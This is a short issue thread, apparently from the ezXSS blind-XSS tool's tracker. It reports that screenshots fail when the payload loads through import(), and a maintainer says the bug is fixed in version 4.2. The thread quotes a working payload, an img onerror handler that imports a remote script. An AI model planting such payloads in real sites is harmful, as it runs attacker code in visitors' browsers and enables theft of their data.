Screenshots don't work while using import() function

Question

Screenshots don't work while using import() function

bugraesk opened this issue a year ago · 3 comments

Hi,

While using import() function to load blind XSS script like <img src=x onerror=import('//xss.domain')>, the html2canvas script doesn't load and we can't get the screenshot. I wonder if the import() blocks that or the script has some issues? import() is very useful due to its shortness, it would be much more useful with screenshots.

Thanks!

Answer 1 · 2024-02-01T13:17:09.000Z

I will look into this. I did not create html2canvas and it might be an issue with this library.

Answer 2 · 2024-02-01T15:48:27.000Z

Thanks. When I try it standalone, it works: https://codepen.io/bugraesk/pen/zYbWRvj

Answer 3 · 2024-02-02T13:41:22.000Z

This is now fixed in ezXSS 4.2 in this commit: e7f4c88